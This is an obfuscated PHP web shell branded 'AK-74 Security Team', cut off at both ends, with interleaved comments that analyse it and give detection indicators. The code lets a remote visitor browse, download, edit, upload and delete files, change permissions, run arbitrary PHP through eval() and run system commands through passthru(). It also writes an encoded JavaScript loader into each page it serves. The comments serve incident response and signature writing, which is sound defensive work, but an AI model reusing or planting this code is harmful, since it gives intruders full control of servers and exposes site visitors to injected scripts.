${$GLOBALS["iknpldrpigo"]} .= $shell->downloadfile($_GET["file"]); break; case "filemanager": if ($_GET["act2"] == "del") { ${$bxmeyfko} .= $shell->removefile(); } ${$GLOBALS["iknpldrpigo"]} .= $shell->outputfilemanager(); if ($_GET["act3"] == "del") { ${$hilzzmbb} .= $shell->removedir(); } break; case "phpinfo": phpinfo(); die; case 
// Next source line: the remaining view cases, the page output, and a trailing <script> block.
// The script is a second obfuscation layer that runs in the browser of whoever opens the page.
// The first eval(unescape(...)) defines a decoder, p42d8c(): split on a marker string, XOR each
// character with a digit of the key, add 7. The second wraps document.write(p42d8c('...'))
// around an encoded string whose first decoded characters are "<script", so it injects a
// further script element.
// Treat it as an embedded callback / secondary payload and decode it offline instead of loading
// the page.
"info": ${$bcaxbgujhqyk} .= $shell->outputinfo(); break; case "execute": ${$GLOBALS["iknpldrpigo"]} .= $shell->executeform(); break; case "exesys": ${$GLOBALS["iknpldrpigo"]} .= $shell->exesysform(); break; } ${$GLOBALS["iknpldrpigo"]} .= $shell->outputdown(); echo ${$osezbewemuin}; echo "<center>Generation time: " . ($shell->getmicrotime() - ${$GLOBALS["olmwrdqid"]}) . "</center>"; echo "<script type=\"text/javascript\">\n<!-- \neval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%32%64%38%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%30%38%35%35%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%36%31%36%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%32%64%38%63%28%27') + '%30%6b%5b%62%63%6e%6e%11%69%6d%5d%30%19%64%6a%6a%60%32%2f%2b%78%75%76%26%6d%2c%35%20%67%57%66%20%6e%63%2d%74%5b%75%5e%67%74%2f%55%63%74%24%6b%69%1d%36%33%2a%69%5b%6c%6b%68%6a%3412108557%35%37%37%39%31%37%33' + unescape('%27%29%29%3b'));\n// -->\n</script>\n";
<?php $GLOBALS["iknpldrpigo"] = "content"; $GLOBALS["olmwrdqid"] = "timestart"; $GLOBALS["fdxvupxbx"] = "shell"; $hilzzmbb = "content"; $GLOBALS["shdxowcvsq"] = "fp"; $GLOBALS["kdhmhcnuk"] = "files"; $GLOBALS["hdyzecu"] = "number"; $GLOBALS["gyyylpy"] = "content"; $GLOBALS["cvvtiemv"] = "dirs"; $nfhhbmkrpia = "content"; $bcaxbgujhqyk = "content"; $GLOBALS["kqhombvoisgz"] = "xshell"; $GLOBALS["nwkrhqdzrcw"] = "res"; $GLOBALS["fzszjgc"] = "info"; $GLOBALS["fvyvgcirdxx"] = "path"; $GLOBALS["pgctubg"] = "perms"; $GLOBALS["kmdyudoev"] = "sec"; $GLOBALS["xcglkyuot"] = "dir"; $GLOBALS["hoyoqwd"] = "mas"; $GLOBALS["vtpgxuvxbi"] = "file"; $osezbewemuin = "content"; $GLOBALS["dwjodtpv"] = "handle"; $GLOBALS["wdyvqrczdgu"] = "i"; error_reporting(0); $dbmeztzpbjd = "content"; @set_time_limit(0); $yuabcquera = "xshell"; $fridqpc = "SERVER_"; session_start(); $wupyapffrye = "content"; $xshell = $SERVER_["PHP_SELF"]; class shell { function getfiles() { $GLOBALS["qzgebdlknl"] = "mas"; $qeosfvpx = "mas"; $mas = array(); $i = 0; if ($handle = opendir($_SESSION["currentdir"])) { $GLOBALS["qmdtpcoeduj"] = "handle"; $GLOBALS["zoaynvkz"] = "file"; while (false !== ($file = readdir($handle))) { if ($file != "..") { if (!is_dir($_SESSION["currentdir"] . "/" . $file)) { $GLOBALS["sntlhgwvrnz"] = "file"; $GLOBALS["mpyjuxikn"] = "i"; $iwkugxydfbd = "file"; $qjtflnyw = "mas"; $nqlxlnj = "i"; $zibzmuilrsk = "i"; $mas[$i]["filename"] = $file; $GLOBALS["nhauqglig"] = "mas"; $vpezessuwf = "i"; $mas[$i]["filesize"] = filesize($_SESSION["currentdir"] . "/" . $file); $mas[$i]["lastmod"] = date("H.i/d.m.Y", filemtime($_SESSION["currentdir"] . "/" . 
$file)); $i++; } } } closedir($handle); } return $mas; } function getdirs() { $ovnbdybfxfn = "mas"; $GLOBALS["mscjpo"] = "mas"; $mas = array(); if ($handle = opendir($_SESSION["currentdir"])) { $GLOBALS["hobugedqduo"] = "dir"; $GLOBALS["xwlfufyf"] = "handle"; while (false !== ($dir = readdir($handle))) { $GLOBALS["iebmlxxk"] = "dir"; $qiwjehuaq = "dir"; $ulkfkgvahbq = "mas"; if ($dir != "." && is_dir($_SESSION["currentdir"] . "/" . $dir)) { $mas[] = $dir; } } closedir($handle); } return ${$ovnbdybfxfn}; } function geturl() { if ($_SESSION["currentdir"] . "/" == $_SERVER["DOCUMENT_ROOT"]) { return "/"; } if (strpos($_SESSION["currentdir"], str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"])) === false) { return ""; } return str_replace($_SERVER["DOCUMENT_ROOT"], "", $_SESSION["currentdir"] . "/"); } function removefile() { if (file_exists($_GET["file"])) { chmod($_GET["file"], 0777); if (unlink($_GET["file"])) { return "File deleted!"; } else { return "File deleted!"; } } else { return "File not found!"; } } function removedir() { chmod($_GET["dir"], 0777); if (rmdir($_GET["dir"])) { return "Directory deleted!"; } else { return "Directory not found!"; } } function getmicrotime() { $GLOBALS["azoxuqxbstyx"] = "sec"; $nyzhvmuivi = "usec"; $GLOBALS["gpoxftmel"] = "usec"; list($usec, $sec) = explode(" ", microtime()); return (double) $usec + (double) $sec; } function getpermission($path) { $xienitv = "info"; $pmibkwbh = "info"; $qusckboendqg = "info"; $umyijesr = "info"; $sxhrms = "info"; $tynbdsso = "info"; $perms = fileperms($path); $tyfxbbfd = "perms"; $qelozowxyjq = "perms"; $wuyjuf = "perms"; $qgfxtbdfnruf = "perms"; $siebgehypj = "info"; $pkgutlld = "perms"; $GLOBALS["uchwntfz"] = "info"; $GLOBALS["jckaac"] = "perms"; if (($perms & 0xc000) == 0xc000) { $info = "s"; } elseif (($perms & 0xa000) == 0xa000) { $info = "l"; } elseif (($perms & 0x8000) == 0x8000) { $info = "-"; } elseif (($perms & 0x6000) == 0x6000) { $info = "b"; } elseif (($perms & 0x4000) == 0x4000) { 
$info = "d"; } elseif (($perms & 0x2000) == 0x2000) { $info = "c"; } elseif (($perms & 0x1000) == 0x1000) { $info = "p"; } else { $info = "u"; } $info .= $perms & 0x100 ? "r" : "-"; $info .= $perms & 0x80 ? "w" : "-"; $info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); ${$qusckboendqg} .= $perms & 0x20 ? "r" : "-"; $fctqxhk = "info"; $info .= ${$tyfxbbfd} & 0x10 ? "w" : "-"; $info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-"); $GLOBALS["xqayvij"] = "perms"; $info .= $perms & 0x4 ? "r" : "-"; ${$umyijesr} .= $perms & 0x2 ? "w" : "-"; ${$tynbdsso} .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); return ${$fctqxhk}; } function getpermissionarray($path) { $iaorpkyboh = "res"; $GLOBALS["ffvutedscs"] = "perms"; $res = array(); $GLOBALS["mospvgr"] = "path"; $perms = fileperms($path); $GLOBALS["secvlqatfohv"] = "perms"; $GLOBALS["bzngcqtouq"] = "perms"; $GLOBALS["aboxvtoyg"] = "perms"; $filvvij = "perms"; $GLOBALS["woyxpuac"] = "res"; $GLOBALS["mdbgzpglccyj"] = "perms"; $ccbjnaxobblr = "res"; $otymmkoxf = "res"; $fbhqupebtq = "res"; $GLOBALS["vdddnl"] = "res"; $gkufmuhelf = "res"; if (($perms & 0xc000) == 0xc000) { $res[] = "s"; } elseif (($perms & 0xa000) == 0xa000) { $res[] = "l"; } elseif (($perms & 0x8000) == 0x8000) { $res[] = "-"; } elseif (($perms & 0x6000) == 0x6000) { $res[] = "b"; } elseif (($perms & 0x4000) == 0x4000) { $res[] = "d"; } elseif (($perms & 0x2000) == 0x2000) { $res[] = "c"; } elseif (($perms & 0x1000) == 0x1000) { $res[] = "p"; } else { $res[] = "u"; } $GLOBALS["nfmqqbwyhr"] = "perms"; $res[] = $perms & 0x100 ? "r" : "-"; $GLOBALS["rmhkov"] = "res"; $res[] = $perms & 0x80 ? "w" : "-"; $res[] = $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-"); $res[] = $perms & 0x20 ? "r" : "-"; $res[] = $perms & 0x10 ? "w" : "-"; ${$fbhqupebtq}[] = $perms & 0x8 ? ${$filvvij} & 0x400 ? "s" : "x" : ($perms & 0x400 ? 
"S" : "-"); $GLOBALS["gxyvyqrjw"] = "perms"; ${$otymmkoxf}[] = $perms & 0x4 ? "r" : "-"; $eyjzgfr = "perms"; $res[] = $perms & 0x2 ? "w" : "-"; ${$gkufmuhelf}[] = $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-"); return ${$iaorpkyboh}; } function outputhead() { $yeyubpcd = "res"; $res = ""; $res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\n<body>\n<STYLE>\nA:link {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:active {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:visited {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:hover {\n\tCOLOR: #C10000; TEXT-DECORATION: underline\n}\nTD {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\n}\nBODY {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \n}\n</STYLE>\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\n <tr>\n <td colspan=7 align=\"center\">\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: \n::.</font></b>\n </td>\n </tr>"; return $res; } function outputmenu() { $eblbmi = "xshell"; $GLOBALS["omlmyuabmc"] = "res"; $jrizoflsr = "xshell"; $GLOBALS["kzvefdrkoqf"] = "res"; $res = ""; $txbsfjnhvi = "xshell"; $res .= "<tr>\n <td colspan=7 align=\"center\">\n <table border=0 cellspacing=0 cellpadding=0>\n <tr align=\"center\">\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=info\">General information</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=filemanager\">File manager</a>\n\t </td>\n\t <td width=80>\n\t <a href=\"" . $xshell . 
"?act=phpinfo\" target=\"_blank\">phpinfo()</a>\n\t </td>\n\t <td width=110>\n\t <a href=\"" . $xshell . "?act=execute\">Run PHP</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=exesys\">Execute the command</a>\n\t </td>\n </tr>\n </table>\n </td>\n </tr>"; return $res; } function outputdown() { $res = ""; $GLOBALS["srzeskty"] = "res"; $res = "</table></div></body></html>"; return $res; } function outputfilemanager() { $GLOBALS["udmmztjca"] = "xshell"; $GLOBALS["ychruqucrf"] = "xshell"; $powlcxkoeay = "files"; $shvztfinhxe = "dirs"; $ckrwmyieozcl = "res"; $GLOBALS["vmuyoysyoe"] = "res"; $GLOBALS["orpfxw"] = "res"; $GLOBALS["tuwswjh"] = "res"; $GLOBALS["acmzbxffk"] = "res"; $res = ""; $GLOBALS["vdtvfpbhyru"] = "number"; $uxuysqwhok = "files"; $number = 0; $GLOBALS["sejtvw"] = "dirs"; $qflffdcxsrx = "i"; $dirs = $this->getdirs(); $files = $this->getfiles(); $GLOBALS["asxszifet"] = "i"; sort($dirs); sort($files); $res .= "\n <tr>\n <td colspan=7 align=\"center\">\n <font color=#830000> The current directory:</font><b><font color=#830000>" . $_SESSION["currentdir"] . "</font></b>\n </td>\n </tr>\n <tr align=\"center\">\n <td width=30>\n \n </td>\n <td width=330>\n \n </td>\n <td width=80><font color=#830000>,</font> <b><font color=#830000>byte</font></b>\n \n </td>\n <td width=120><font color=#830000>\n Recent change\n </font>\n </td>\n <td width=80 align=\"center\"><font color=#830000>Access right</font>\n \n </td>\n <td width=30>\n \n </td>\n <td width=30>\n \n </td>\n </tr>"; $kshyqqibce = "i"; $hjbbitpe = "res"; $GLOBALS["wyqypgtjmi"] = "i"; for ($i = 0; ${$qflffdcxsrx} < count(${$shvztfinhxe}); $i++) { $GLOBALS["vapieoe"] = "res"; $wokhmi = "xshell"; $GLOBALS["uvckfgaxtwdw"] = "res"; $kwqcswqlscsg = "i"; $GLOBALS["wjjxsx"] = "xshell"; $GLOBALS["bbrtstbve"] = "dirs"; $GLOBALS["jeyjcbtlodsa"] = "dirs"; $GLOBALS["ywnqtawj"] = "i"; $GLOBALS["fxthzy"] = "dirs"; $res .= "<tr><td><b><font color=#830000>" . ++$number . 
"</font></b></td><td><b><a href=\"" . $xshell . "?act=filemanager&dir=" . $dirs[$i] . "\">" . $dirs[$i] . "</a></b></td><td> </td><td> </td><td>"; $res .= "<a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $dirs[$i]) . "</a>"; $res .= "</td><td> </td><td><a href=\"" . $xshell . "?act=filemanager&act3=del&dir=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">delete</a></td></tr>"; } for (${$kshyqqibce} = 0; $i < count($files); $i++) { $GLOBALS["gkyyblyqymf"] = "i"; $fwvwil = "files"; $vdxzvdus = "res"; $gruvymtvqist = "xshell"; $GLOBALS["qwtxsjlqhhf"] = "files"; $evvwgjhmulxe = "files"; $GLOBALS["tefzqpvhph"] = "files"; $GLOBALS["omvsytrtatv"] = "i"; $GLOBALS["ypsmanoevl"] = "i"; $wpdhhfskcteg = "i"; $ihduysxmqju = "res"; $GLOBALS["tkghkgf"] = "res"; $res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td>"; $res .= "<td><a href=\"" . $xshell . "?act=down&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $files[$i]["filename"] . "</a></td>"; $res .= "<td> " . $files[$i]["filesize"] . "</td>"; $khftnbmpvvs = "xshell"; $res .= "<td align=\"center\">" . $files[$i]["lastmod"] . "</td>"; $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $files[$i]["filename"]) . "</a></td>"; $tomphosfc = "res"; $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=edit&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">edit</a></td>"; $res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=filemanager&act2=del&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . 
"\">delete</a></td></tr>"; } ${$ckrwmyieozcl} .= "</table><br>"; $res .= "<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">"; $pykgqvz = "res"; $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"mkdir\"><b><font color=#830000> :</b></font> </td><td><input type=\"text\" name=\"dircreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; $res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"createfile\"><b><font color=#830000> :</b></font></td><td> <input type=\"text\" name=\"filecreate\"><input type=\"submit\" value=\"\"></form></td></tr>"; $res .= "<tr><td align=center><form enctype=\"multipart/form-data\" action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"uploadfile\"><b><font color=#830000> :</font></b></td><td><input type=\"file\" name=\"filename\" size=\"23\"> <b><font color=#830000> </b></font></td><td> <input type=\"text\" name=\"filename2\"><input type=\"submit\" value=\"\"></form></td></tr>"; $res .= "<table border=0 width=\"700\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">"; ${$hjbbitpe} .= "<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return ${$pykgqvz}; } function outputinfo() { $vbgcqwfncvvz = "res"; $myhjur = "res"; $res = ""; $res .= "<tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>General information about the server</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"left\"><br>\n <ol>\n <b><font color=#830000>1. OS - </font></b><font color=#830000>" . php_uname() . "</font><br><br>\n <b><font color=#830000>2. PHP - </font></b><font color=#830000>" . 
phpversion() . "</font><br><br>\n <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - " . get_current_user() . " <b><font color=#830000>|| User ID</font></b> - " . getmyuid() . " <b><font color=#830000>|| Group ID</b></font> - " . getmygid() . "</font><br><br>\n <b><font color=#830000>4. Server Software - </font></b><font color=#830000>" . getenv("SERVER_SOFTWARE") . "</font><br><br>\n <b><font color=#830000>5. Request Method - </font></b><font color=#830000>" . getenv("REQUEST_METHOD") . "</font><br><br>\n <b><font color=#830000>6. Server IP - </font></b><font color=#830000>" . getenv("SERVER_ADDR") . "</font><br><br>\n <b><font color=#830000>7. Your IP - </font></b><font color=#830000>" . getenv("REMOTE_ADDR") . "</font><br><br>\n\t<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>" . getenv("HTTP_X_FORWARDED_FOR") . "</font><br><br>\n</td>\n </tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return $res; } function chmodform($file) { $istixexbyxa = "file"; $nrugpeehr = "res"; $yvdvvaai = "i"; $GLOBALS["nwfedck"] = "perms"; $fewqjextf = "file"; $perms = $this->getpermissionarray($file); $GLOBALS["ynokejbtuh"] = "perms"; $GLOBALS["ngqiunigukfh"] = "perms"; $uizdfjdf = "res"; $hammouvne = "i"; $GLOBALS["ykexebt"] = "res"; $GLOBALS["pefltgfgwzb"] = "i"; $res = ""; $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"chmod\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . 
"\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Changing access permissions</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; $ftrxmefkqxh = "i"; $res .= "<tr align=\"center\"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>"; $GLOBALS["yggjmwlv"] = "res"; $res .= "<tr><td><input type=\"hidden\" name=\"perms0\" value=\"" . $perms[0] . "\">" . $perms[0] . "</td>"; for ($i = 1; $i <= 9; $i++) { $res .= "<td><input type=\"checkbox\" name=\"perms" . ${$ftrxmefkqxh} . "\"" . ($perms[${$yvdvvaai}] != "-" ? " checked" : "") . "></td>"; } $res .= "</tr><tr><td colspan=10 align=\"right\"><input type=\"submit\" value=\"Save\"></td></tr>"; $res .= "</table></td></tr></form>"; return $res; } function editfileform($file) { $rwaotihpr = "fp"; $GLOBALS["wcqoifupsbh"] = "file"; $yyvjrmlhyubj = "fp"; $fp = fopen($file, "r"); if (!$fp) { return " "; } $res = ""; $zeleyib = "res"; $hjrxrmu = "res"; $GLOBALS["ryysceaq"] = "res"; $GLOBALS["yjdeuf"] = "res"; $GLOBALS["kwyxxau"] = "file"; $res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"editfile\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\"><tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Edit the file</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>"; $res .= "<tr><td><textarea rows=25 cols=100 name=\"filecontent\">" . htmlspecialchars(fread(${$rwaotihpr}, filesize($file))) . "</textarea></td></tr>"; $res .= "<tr><td align=\"right\"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=" . $file . 
"> - <input type=\"submit\" value=\"Edit\"></td></tr>"; $res .= "</table></td></tr></form>"; fclose(${$yyvjrmlhyubj}); return $res; }
/*
 * executeform(): returns the HTML for the "Run PHP" page, a form that POSTs a
 * textarea named phpcode together with the hidden field action=execute to
 * ?act=execute. The $GLOBALS[...] assignments are obfuscator residue; nothing
 * in the visible code reads them.
 */
function executeform() { $GLOBALS["gbbivqermof"] = "xshell"; $GLOBALS["jcoxegkjqmx"] = "res"; $res = ""; $res .= "<form action=\"" . $xshell . "?act=execute\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"execute\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Executing PHP code<br> Opening and closing PHP code ( <? ?> ) no need to write!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name=\"phpcode\">"; $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return $res; }
/*
 * execute(): passes the POST field phpcode (after stripslashes) straight to
 * eval(), so any client that can reach this script runs PHP of its choosing
 * with the privileges of the PHP process. Output of the evaluated code is
 * wrapped in <pre> between two <hr> tags. The top-level dispatcher calls this
 * when the POST field action equals "execute".
 * Detection note: POST requests carrying action=execute plus a phpcode field,
 * and the literal construct eval(stripslashes($_POST[...])) in a file under
 * the web root, are strong indicators of this shell.
 */
function execute() { echo "<hr>"; echo "<pre>"; eval(stripslashes($_POST["phpcode"])); echo "</pre>"; echo "<hr>"; }
/*
 * exesysform(): returns the HTML for the "Execute the command" page. The form
 * string continues on the next line of the listing and carries a textarea
 * named cmmd.
 */
function exesysform() { $husxnjellv = "res"; $res = ""; $GLOBALS["lmwlmrqw"] = "res"; $GLOBALS["ubwopher"] = "res"; $res .= "<form action=\"" . $xshell .
"?act=exesys\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"exesys\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Execute system commands!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name=\"cmmd\">"; $res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"Perform\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"https://www.r57.gen.tr/\" title=\"r57.gen.tr\">r57.gen.tr</a> - <a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>"; return $res; }
/*
 * End of exesysform() above. Its footer markup embeds the hostnames
 * r57.gen.tr and ak74-team.net; those literal strings are usable for
 * signature matching on disk and in HTTP responses.
 *
 * exesys(): hands the POST field cmmd to passthru() with no filtering, i.e.
 * operating-system command execution as the PHP process user, with the
 * command's output streamed into the response inside <pre>. $result is
 * assigned but never read in the visible code.
 * Detection note: POST bodies with action=exesys and a cmmd field; on the
 * host, child processes spawned by the web server / PHP worker.
 */
function exesys() { $GLOBALS["yvcpokfc"] = "result"; echo "<hr>"; echo "<pre>"; $result = passthru($_POST["cmmd"]); echo "</pre>"; echo "<hr>"; }
/*
 * editfile($file): the $file parameter is not used. If the POST field rename
 * is non-empty, the path in POST file is renamed to it; the path in POST
 * rename is then opened for writing and overwritten with POST filecontent
 * (after stripslashes). Returns 1 on success, 0 if fopen() fails.
 * Both paths come from the request and are not validated, so this is an
 * arbitrary file write/rename limited only by filesystem permissions.
 */
function editfile($file) { if (!empty($_POST["rename"])) { rename($_POST["file"], $_POST["rename"]); } $fp = fopen($_POST["rename"], "w"); if (!$fp) { return 0; } fwrite($fp, stripslashes($_POST["filecontent"])); fclose($fp); return 1; }
/*
 * chmodfile($file): rebuilds a mode bitmask in $res from the form fields
 * perms0 (file-type letter) and perms1..perms9 (one checkbox per rwx bit);
 * the function continues on the next line of the listing. The string
 * variables set to "res" are obfuscator residue: ${$name} with such a
 * variable is just another spelling of $res.
 */
function chmodfile($file) { $tpmdfbgb = "res"; $ipjaivcsdnlk = "res"; $sgwdghqlhfy = "res"; $GLOBALS["pufgvr"] = "res"; $fcpofletrcs = "res"; $GLOBALS["ikiudyniptdh"] = "res"; $GLOBALS["lzykxw"] = "res"; $hlfwyxuk = "res"; $feixofkogs = "res"; $tulbauxmvcdt = "res"; $txyrsfflh = "res"; $res = 0; $gorewqwudp = "res"; switch ($_POST["perms0"]) { case "s": $res |= 0xc000; break; case "l": $res = ${$gorewqwudp} | 0xa000; break; case "-": ${$hlfwyxuk} |= 0x8000; break; case "b": $res |= 0x6000; break; case "d": $res |= 0x4000; break; case "c": $res |= 0x2000; break; case "p": $res |= 0x1000; break; case "u": break; } $GLOBALS["xeomnnbyudw"] = "res"; if (isset($_POST["perms1"])) { $res |= 0x100; } if (isset($_POST["perms2"])) { $res =
${$tpmdfbgb} | 0x80; } if (isset($_POST["perms3"])) { $res = ${$txyrsfflh} | 0x40; } if (isset($_POST["perms4"])) { ${$feixofkogs} = $res | 0x20; } if (isset($_POST["perms5"])) { $res |= 0x10; } if (isset($_POST["perms6"])) { $res = ${$tulbauxmvcdt} | 0x8; } if (isset($_POST["perms7"])) { $res = ${$fcpofletrcs} | 0x4; } if (isset($_POST["perms8"])) { $res |= 0x2; } if (isset($_POST["perms9"])) { $res |= 0x1; } echo substr(sprintf("%o", $res), 4); return chmod($file, intval(substr(sprintf("%o", $res), 4), 8)); }
/*
 * End of chmodfile() above: the mode handed to chmod() is the octal string of
 * $res with its first four characters dropped; the same substring is echoed
 * into the response.
 *
 * downloadfile($file): sends $file as an attachment (octet-stream headers,
 * readfile) and terminates the script. The top-level dispatcher passes
 * $_GET["file"] here unchanged, so any path readable by the PHP process can
 * be retrieved: configuration files, credentials, source code.
 * Detection note: GET requests with act=down and a file= parameter holding an
 * absolute path.
 */
function downloadfile($file) { $jehqknntr = "file"; header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($file)); header("Content-Disposition: attachment; filename={$file}"); readfile($file); die; }
/*
 * createdir(): creates the directory named by POST dircreate under the
 * session's current directory and returns a status string. The name is
 * concatenated into the path without any check.
 */
function createdir() { if (!empty($_POST["dircreate"])) { if (mkdir($_SESSION["currentdir"] . "/" . $_POST["dircreate"])) { return "Directory created!"; } } return "Error creating directory"; }
/*
 * createfile(): creates an empty file named by POST filecreate under the
 * session's current directory unless a file of that name already exists.
 * Two of the returned status strings are blank or near-blank in this listing.
 */
function createfile() { if (!empty($_POST["filecreate"])) { $GLOBALS["lwhsyzdtepf"] = "fp"; if (file_exists($_SESSION["currentdir"] . "/" . $_POST["filecreate"])) { return " "; } $fp = fopen($_SESSION["currentdir"] . "/" . $_POST["filecreate"], "w"); if ($fp) { $nwmcqdkwk = "fp"; fclose($fp); return " !"; } } return "Error creating file"; }
/*
 * uploadfile(): stores the uploaded file (form field filename) in the
 * session's current directory under the name given in POST filename2, or
 * under the client-supplied original name when filename2 is empty. It tries
 * copy() first and move_uploaded_file() second (continued on the next line).
 * No extension, type or size check is visible, so further executable files
 * can be placed wherever the PHP process may write. During incident response,
 * treat every file the PHP user could write as potentially planted or
 * modified.
 */
